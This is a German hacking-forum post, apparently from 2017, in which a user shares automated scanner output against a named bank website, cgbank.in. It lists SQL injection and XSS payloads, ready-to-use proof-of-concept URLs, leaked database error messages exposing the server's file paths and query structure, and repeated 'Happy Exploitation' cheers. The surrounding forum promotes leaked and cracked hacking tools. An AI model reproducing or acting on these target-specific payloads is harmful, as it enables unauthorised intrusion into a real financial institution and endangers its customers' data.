Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

[SQLi+XSS] cgbank.in

- - - - -
Started by TeamSploit ,

  • Please log in to reply
No replies to this topic

#1
TeamSploit
Posted 08 May 2017 - 15:37 Uhr

TeamSploit

    Noob

  • Members
  • PipPip
    • Likes
    0
  • 3 posts
  • 0 Bedankt
  • verifiziert
[!] Scan URL or List of URLs? [1/2]: 1
 [!] Enter the URL: http://www.cgbank.in/innerpage.php?pageID=3

 [!] Fingerprinting the backend Technologies.
 [!] Status code: 200 OK
 [!] Host: www.cgbank.in
 [!] WebServer: Microsoft-IIS/8.5
 [!] x-powered-by
 [!] PHP/5.2.17, ASP.NET
 [!] Now Scanning for Remote Code/Command Execution
 [!] Covering Linux & Windows Operating Systems
 [!] Please wait ....
 [!] Target is not vulnerable!

 [!] Now Scanning for XSS
 [!] Please wait ....
 [*] Payload Found . . .
 [*] Payload:  %78%22%78%3e%78
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"x>x' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=3x\"x>x in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=3%78%22%78%3e%78
 [*] Happy Exploitation :D
 [!] Congratulations you've found 1 bugs :-)

 [!] Now Scanning for Error Based SQL Injection
 [!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
 [!] Please wait ....
 [*] Payload Found . . .
 [*] Payload:  3'
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\' in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33'
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3%5c
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\\ in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33%5c
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3%27%22%28%29
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"()' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\'\"() in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33%27%22%28%29
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3'><
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'><' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\'>< in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33'><
 [*] Happy Exploitation :D
 [!] Congratulations you've found 4 bugs :-)

Back to  Classic Hacking

  Topic Forum Started By Stats Last Post Info

user(s) are reading this topic

members, guests, anonymous users


This topic has been visited by 42 user(s)


    3eyes, Caruso, clusterhead, cruzz, cubik, Dr. Spic, dvalar, easysurfer, EShad0w, FatalityMods, Framerater, h04x, hacked, Hansiberg, hitman56, jmPesp, JohnR, Klaus, kleinkriminell, kpakpando, Kraenk, loginman1, MarkSantos, mashok, n1nja, Nexus88, PadX18, pekelhc, ProHex, rat123, romiro, SavE1, SecurityFlaw, Smokyjoe, SOCOM, st0rm, Stalin, stoneserv, TeamSploit, twixeis, w0tan, xrahitel
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking